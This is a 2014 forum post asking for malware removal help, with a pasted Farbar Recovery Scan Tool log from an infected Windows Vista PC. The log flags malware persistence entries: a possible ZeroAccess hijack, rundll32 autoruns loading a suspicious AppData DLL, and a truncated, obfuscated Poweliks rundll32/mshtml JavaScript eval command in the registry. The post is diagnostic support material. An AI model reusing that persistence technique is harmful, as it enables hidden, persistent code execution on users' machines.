
Another dlhost.exe 32* Problem


  • This topic is locked
12 replies to this topic

#1 mleehogg

  • Members
  • 8 posts

Posted 14 September 2014 - 10:29 AM

Like others, this is running lots of processes and crashing my computer. Here are my Farbar logs.

 

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 12-09-2014
Ran by Hogg (administrator) on HOGG-PC on 14-09-2014 09:22:02
Running from C:\Users\Hogg\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FOT92IOD
Platform: Windows Vista ™ Home Premium Service Pack 2 (X64) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(IObit) C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFsrv.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\ccsvchst.exe
() C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe
(AVG Secure Search) C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
() C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\loggingserver.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\ccsvchst.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.8.141\SSScheduler.exe
() C:\Program Files (x86)\AVG SafeGuard toolbar\vprot.exe
(RealNetworks, Inc.) C:\Program Files (x86)\real\realplayer\Update\realsched.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Google Inc.) C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbarUser_32.exe
(Microsoft Corporation) C:\Windows\System32\mcbuilder.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SmartMenu] => C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe [915512 2009-03-05] (Hewlett-Packard)
HKLM-x32\...\Run: [vProt] => C:\Program Files (x86)\AVG SafeGuard toolbar\vprot.exe [2640408 2014-08-25] ()
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.)
HKLM-x32\...\Run: [TkBellExe] => c:\program files (x86)\real\realplayer\Update\realsched.exe [295512 2013-10-23] (RealNetworks, Inc.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-09-01] (Apple Inc.)
HKLM-x32\...\Run: [IObit Malware Fighter] => C:\Program Files (x86)\IObit\IObit Malware Fighter\IMF.exe [1486144 2013-05-13] (IObit)
HKLM\...D6A79037F57F\InprocServer32: [Default-fastprox]  ATTENTION! ====> ZeroAccess?
HKU\.DEFAULT\...\Run: [{C41A51F9-C162-4A86-AEA9-955929DA2DAE}] => rundll32 "C:\Users\Hogg\AppData\Local\{472011AB-211B-4DA4-8CDF-9AD275078570}\{C41A51F9-C162-4A86-AEA9-955929DA2DAE}\cgpgoheo.dll",DllRegisterServer <===== ATTENTION
HKU\S-1-5-19\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
HKU\S-1-5-19\...\Run: [{C41A51F9-C162-4A86-AEA9-955929DA2DAE}] => rundll32 "C:\Users\Hogg\AppData\Local\{472011AB-211B-4DA4-8CDF-9AD275078570}\{C41A51F9-C162-4A86-AEA9-955929DA2DAE}\cgpgoheo.dll",DllRegisterServer <===== ATTENTION
HKU\S-1-5-20\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
HKU\S-1-5-20\...\Run: [{C41A51F9-C162-4A86-AEA9-955929DA2DAE}] => rundll32 "C:\Users\Hogg\AppData\Local\{472011AB-211B-4DA4-8CDF-9AD275078570}\{C41A51F9-C162-4A86-AEA9-955929DA2DAE}\cgpgoheo.dll",DllRegisterServer <===== ATTENTION
HKU\S-1-5-21-764796802-3477399101-373240229-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.8.141\SSScheduler.exe (McAfee, Inc.)
BootExecute: autocheck autochk * bootdelete

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-us
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?PC=msnHomeST&OCID=msnHomepage
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_us&c=93&bd=Pavilion&pf=cndt
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_us&c=93&bd=Pavilion&pf=cndt
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_us&c=93&bd=Pavilion&pf=cndt
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKLM - {9BB47C17-9C68-4BB3-B188-DD9AF0FD2406} URL = http://dts.search-results.com/sr?src=ieb&gct=ds&appid=394&systemid=406&apn_dtid=BND406&apn_ptnrs=AG6&o=APN10645&apn_uid=2492936740354564&q={searchTerms}
SearchScopes: HKLM - {B237E68D-B139-4E1C-9631-FE577DBCC43D} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
SearchScopes: HKLM - {B906CA8F-1CE6-4F1E-9138-E48432C0DC4B} URL = http://search.live.com/results.aspx?q={searchTerms}&FORM=HPDTDF
SearchScopes: HKLM-x32 - DefaultScope {4591E5ED-D4E2-45E9-9618-6C9ABFE25973} URL =
SearchScopes: HKLM-x32 - {B237E68D-B139-4E1C-9631-FE577DBCC43D} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
SearchScopes: HKLM-x32 - {B906CA8F-1CE6-4F1E-9138-E48432C0DC4B} URL = http://search.live.com/results.aspx?q={searchTerms}&FORM=HPDTDF
SearchScopes: HKLM-x32 - {FB144184-B500-42F4-9A1B-8A558CB28A3F} URL = http://dts.search-results.com/sr?src=ieb&gct=ds&appid=394&systemid=406&apn_dtid=BND406&apn_ptnrs=AG6&o=APN10645&apn_uid=2492936740354564&q={searchTerms}
SearchScopes: HKCU - DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKCU - {4591E5ED-D4E2-45E9-9618-6C9ABFE25973} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3309350&CUI=UN22661023661384124&UM=2
SearchScopes: HKCU - {B237E68D-B139-4E1C-9631-FE577DBCC43D} URL =
SearchScopes: HKCU - {B906CA8F-1CE6-4F1E-9138-E48432C0DC4B} URL =
SearchScopes: HKCU - {FB144184-B500-42F4-9A1B-8A558CB28A3F} URL =
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO-x32: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.141\McAfeeMSS_IE.dll (McAfee, Inc.)
BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll (RealDownloader)
BHO-x32: PasswordBox Helper -> {5DB69B97-934B-451D-94DB-32EF802A01CD} -> C:\Program Files (x86)\PasswordBox\Application\pbbtn.dll (PasswordBox, Inc.)
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\coIEPlg.dll (Symantec Corporation)
BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\IPS\IPSBHO.DLL (Symantec Corporation)
BHO-x32: AVG SafeGuard toolbar -> {95B7759C-8C7F-4BF1-B163-73684A933233} -> C:\Program Files (x86)\AVG SafeGuard toolbar\18.1.9.799\AVG SafeGuard toolbar_toolbar.dll (AVG Secure Search)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM-x32 - Microsoft Live Search Toolbar - {1E61ED7C-7CB8-49d6-B9E9-AB4C880C8414} - c:\Program Files (x86)\MSN\Toolbar\3.0.0552.0\msneshellx.dll (Microsoft Corp.)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\coIEPlg.dll (Symantec Corporation)
Toolbar: HKLM-x32 - AVG SafeGuard toolbar - {95B7759C-8C7F-4BF1-B163-73684A933233} - C:\Program Files (x86)\AVG SafeGuard toolbar\18.1.9.799\AVG SafeGuard toolbar_toolbar.dll (AVG Secure Search)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - No Name - {604BC32A-9680-40D1-9AC6-E06B23A1BA4C} -  No File
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKCU - No Name - {5B291E6C-9A74-4034-971B-A4B007A0B315} -  No File
Toolbar: HKCU - No Name - {B7DE27CA-0626-478A-95D6-6C0804782455} -  No File
DPF: HKLM-x32 {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} http://appldnld.apple.com.edgesuite.net/content.info.apple.com/QuickTime/qtactivex/qtplugin.cab
DPF: HKLM-x32 {1851174C-97BD-4217-A0CC-E908F60D5B7A} http://h20364.www2.hp.com/CSMWeb/Customer/cabs/HPISDataManager.CAB
DPF: HKLM-x32 {20A60F0D-9AFA-4515-A0FD-83BD84642501} http://messenger.zone.msn.com/binary/msgrchkr.cab56986.cab
DPF: HKLM-x32 {5D6F45B3-9043-443D-A792-115447494D24} http://messenger.zone.msn.com/MessengerGamesContent/GameContent/Default/uno1/GAME_UNO1.cab
DPF: HKLM-x32 {6F15128C-E66A-490C-B848-5000B5ABEEAC} https://h20436.www2.hp.com/ediags/dex/secure/HPDEXAXO.cab
DPF: HKLM-x32 {73ECB3AA-4717-450C-A2AB-D00DAD9EE203} http://h20270.www2.hp.com/ediags/gmn2/install/HPProductDetection2.cab
DPF: HKLM-x32 {8100D56A-5661-482C-BEE8-AFECE305D968} http://upload.facebook.com/controls/2009.07.28_v5.5.8.1/FacebookPhotoUploader55.cab
DPF: HKLM-x32 {C3F79A2B-B9B4-4A66-B012-3EE46475B072} http://messenger.zone.msn.com/binary/MessengerStatsPAClient.cab56907.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler-x32: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - C:\Program Files (x86)\Common Files\AVG Secure Search\ViProtocolInstaller\18.1.9\ViProtocol.dll (AVG Secure Search)
Winsock: Catalog5 01 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Winsock: Catalog5 05 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
Winsock: Catalog5-x64 01 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Winsock: Catalog5-x64 05 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
Tcpip\Parameters: [DhcpNameServer] 209.18.47.61 209.18.47.62

FireFox:
========
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin -> C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\18.1.9\\npsitesafety.dll No File
FF Plugin-x32: @checkpoint.com/FFApi -> C:\Program Files\CheckPoint\ZAForceField\WOW64\TrustChecker\bin\npFFApi.dll No File
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin-x32: @java.com/DTPlugin,version=1.6.0_38 -> C:\Windows\SysWOW64\npdeployJava1.dll (Sun Microsystems, Inc.)
FF Plugin-x32: @java.com/JavaPlugin -> C:\Program Files (x86)\Java\jre6\bin\plugin2\npjp2.dll (Sun Microsystems, Inc.)
FF Plugin-x32: @mcafee.com/McAfeeMssPlugin -> C:\Program Files\McAfee Security Scan\3.8.141\npMcAfeeMss.dll (McAfee, Inc.)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin-x32: @pack.google.com/Google Updater;version=13 -> C:\Program Files (x86)\Google\Google Updater\2.4.1636.7222\npCIDetect13.dll (Google)
FF Plugin-x32: @real.com/nppl3260;version=16.0.3.51 -> c:\program files (x86)\real\realplayer\Netscape6\nppl3260.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlchromebrowserrecordext;version=1.3.3 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlhtml5videoshim;version=1.3.3 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlpepperflashvideoshim;version=1.3.3 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpplugin;version=16.0.3.51 -> c:\program files (x86)\real\realplayer\Netscape6\nprpplugin.dll (RealPlayer)
FF Plugin-x32: @realnetworks.com/npdlplugin;version=1 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll (RealDownloader)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @Skype Limited.com/Facebook Video Calling Plugin -> C:\Users\Hogg\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll (Skype Limited)
FF Extension: Define Ext - C:\Program Files (x86)\Mozilla Firefox\extensions\umylsm@sqhjcpzmeselzlp.org [2013-08-19]
FF HKLM-x32\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-08-07]
FF HKLM-x32\...\Firefox\Extensions: [{7BA52691-1876-45ce-9EE6-54BCB3B04BBC}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\Norton\coFFPlgn
FF HKLM-x32\...\Firefox\Extensions: [{97E22097-9A2F-45b1-8DAF-36AD648C7EF4}] - C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\Firefox\Ext
FF HKLM-x32\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2
FF Extension: HP Smart Web Printing - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2 [2013-01-12]
FF HKLM-x32\...\Firefox\Extensions: [{ABDE892B-13A8-4d1b-88E6-365A6E755758}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: RealDownloader - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2013-10-23]
FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.2.0.19\coFFPlgn
FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.2.0.19\coFFPlgn [2014-09-14]
FF HKLM-x32\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.2.0.19\IPSFF
FF Extension: Norton Vulnerability Protection - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.2.0.19\IPSFF [2013-10-09]
FF HKLM-x32\...\Firefox\Extensions: [{FFB96CC1-7EB3-449D-B827-DB661701C6BB}] - C:\Program Files\CheckPoint\ZAForceField\WOW64\TrustChecker
FF HKLM-x32\...\Firefox\Extensions: [avg@toolbar] - C:\ProgramData\AVG SafeGuard toolbar\FireFoxExt\17.3.0.49
FF Extension: AVG SafeGuard toolbar - C:\ProgramData\AVG SafeGuard toolbar\FireFoxExt\17.3.0.49 [2014-01-10]
FF HKLM-x32\...\Firefox\Extensions: [{DF153AFF-6948-45d7-AC98-4FC4AF8A08E2}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF HKCU\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2

Chrome:
=======
Error reading preferences. Please check "preferences" file for possible corruption. <======= ATTENTION
CHR Profile: C:\Users\Hogg\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Norton Identity Protection) - C:\Users\Hogg\AppData\Local\Google\Chrome\User Data\Default\Extensions\bejnhdlplbjhffionohbdnpcbobfejcc [2014-06-20]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Hogg\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-06-29]
CHR Extension: (Google Wallet) - C:\Users\Hogg\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-01-10]
CHR HKCU\...\Chrome\Extension: [iigplimlmgilpobjilfbfeilnpiigpgl] - C:\Users\Hogg\AppData\Local\CRE\iigplimlmgilpobjilfbfeilnpiigpgl.crx [2013-08-15]
CHR HKLM-x32\...\Chrome\Extension: [bejnhdlplbjhffionohbdnpcbobfejcc] - C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\Exts\Chrome.crx [2014-05-01]
CHR HKLM-x32\...\Chrome\Extension: [idhngdhcfkoamngbedgpaokgjbnpdiji] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Chrome\Ext\realdownloader.crx [2013-08-14]
CHR HKLM-x32\...\Chrome\Extension: [iigplimlmgilpobjilfbfeilnpiigpgl] - C:\Users\Hogg\AppData\Local\CRE\iigplimlmgilpobjilfbfeilnpiigpgl.crx [2013-08-15]
CHR HKLM-x32\...\Chrome\Extension: [ogccgbmabaphcakpiclgcnmcnimhokcj] - C:\Windows\SysWOW64\jmdp\SweetNT.crx [2013-08-15]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S4 DTSRVC; C:\Program Files (x86)\Common Files\Portrait Displays\Shared\DTSRVC.exe [69632 2008-06-24] () [File not signed]
R2 ezSharedSvc; C:\Windows\SysWOW64\ezsvc7.dll [129992 2008-02-03] (EasyBits Sofware AS) [File not signed]
S4 FLEXnet Licensing Service; C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [651720 2009-08-06] (Macrovision Europe Ltd.) [File not signed]
S2 gupdate1ca1c3cefd8b09c; C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [133104 2009-08-13] (Google Inc.)
S4 HP Health Check Service; c:\Program Files (x86)\Hewlett-Packard\HP Health Check\hphc_service.exe [94208 2008-12-04] (Hewlett-Packard) [File not signed]
S4 HPBtnSrv; C:\Program Files (x86)\Hewlett-Packard\HP Easy Backup\HPBtnSrv.exe [192512 2008-09-30] () [File not signed]
R2 hpqddsvc; C:\Program Files (x86)\HP\Digital Imaging\bin\hpqddsvc.dll [135168 2008-10-16] (Hewlett-Packard Co.) [File not signed]
R2 HPSLPSVC; C:\Program Files (x86)\HP\Digital Imaging\bin\HPSLPSVC64.DLL [906752 2008-10-16] (Hewlett-Packard Co.) [File not signed]
S4 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [73728 2004-10-22] (Macrovision Corporation) [File not signed]
R2 IMFservice; C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFsrv.exe [335168 2013-04-25] (IObit)
S4 LightScribeService; c:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [73728 2009-03-17] (Hewlett-Packard Company) [File not signed]
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.141\McCHSvc.exe [289256 2014-01-15] (McAfee, Inc.)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2008-07-18] (Hewlett-Packard) [File not signed]
R2 NIS; C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\ccSvcHst.exe [144368 2013-05-20] (Symantec Corporation)
R2 RealNetworks Downloader Resolver Service; C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [39056 2013-08-14] ()
S4 sprtsvc_ncnetworksdm; C:\Program Files (x86)\NCNETWORKSDM\bin\sprtsvc.exe [206120 2010-06-17] (SupportSoft, Inc.)
S4 tgsrvc_ncnetworksdm; C:\Program Files (x86)\NCNETWORKSDM\bin\tgsrvc.exe [185640 2010-06-17] (SupportSoft, Inc.)
R2 vToolbarUpdater18.1.9; C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe [1820184 2014-08-11] (AVG Secure Search)
S2 RoxLiveShare9; No ImagePath

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 ASPI; C:\Windows\SysWOW64\DRIVERS\ASPI32.sys [84832 2002-07-17] (Adaptec) [File not signed]
R1 avgtp; C:\Windows\system32\drivers\avgtpx64.sys [50976 2014-08-11] (AVG Technologies)
R1 BHDrvx64; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.2.0.19\Definitions\BASHDefs\20140821.007\BHDrvx64.sys [1588016 2014-08-18] (Symantec Corporation)
R1 ccSet_NIS; C:\Windows\system32\drivers\NISx64\1405000.01C\ccSetx64.sys [169048 2013-04-15] (Symantec Corporation)
S3 cpuz132; No ImagePath
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [487216 2014-09-09] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [142640 2014-09-09] (Symantec Corporation)
S4 FileMonitor; C:\Program Files (x86)\IObit\IObit Malware Fighter\Drivers\wlh_amd64\FileMonitor.sys [23048 2013-03-23] (IObit)
S3 hitmanpro36; C:\Windows\system32\drivers\hitmanpro36.sys [30496 2012-09-06] ()
R1 IDSVia64; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.2.0.19\Definitions\IPSDefs\20140912.001\IDSvia64.sys [633560 2014-08-29] (Symantec Corporation)
S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [122584 2014-09-14] (Malwarebytes Corporation)
R3 NAVENG; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.2.0.19\Definitions\VirusDefs\20140912.023\ENG64.SYS [129752 2014-09-11] (Symantec Corporation)
R3 NAVEX15; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.2.0.19\Definitions\VirusDefs\20140912.023\EX64.SYS [2137304 2014-09-11] (Symantec Corporation)
R3 PdiPorts; C:\Windows\System32\DRIVERS\PdiPorts.sys [20592 2009-06-23] (Portrait Displays, Inc.)
R3 RegFilter; C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\wlh_amd64\regfilter.sys [34336 2013-03-26] (IObit.com)
S3 RimUsb; No ImagePath
S3 RimVSerPort; C:\Windows\System32\DRIVERS\RimSerial_AMD64.sys [31744 2009-01-09] (Research in Motion Ltd)
S1 SASDIFSV; No ImagePath
S3 SASENUM; No ImagePath
S1 SASKUTIL; No ImagePath
R1 SRTSP; C:\Windows\System32\Drivers\NISx64\1405000.01C\SRTSP64.SYS [796760 2013-05-15] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\NISx64\1405000.01C\SRTSPX64.SYS [36952 2013-03-04] (Symantec Corporation)
R0 SymDS; C:\Windows\System32\drivers\NISx64\1405000.01C\SYMDS64.SYS [493656 2013-05-20] (Symantec Corporation)
R0 SymEFA; C:\Windows\System32\drivers\NISx64\1405000.01C\SYMEFA64.SYS [1139800 2013-05-22] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [177312 2013-06-12] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\NISx64\1405000.01C\Ironx64.SYS [224416 2013-03-04] (Symantec Corporation)
R1 SYMTDIv; C:\Windows\System32\Drivers\NISx64\1405000.01C\SYMTDIV.SYS [457304 2013-04-24] (Symantec Corporation)
S3 UrlFilter; C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\wlh_amd64\UrlFilter.sys [23016 2013-03-26] (IObit.com)
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
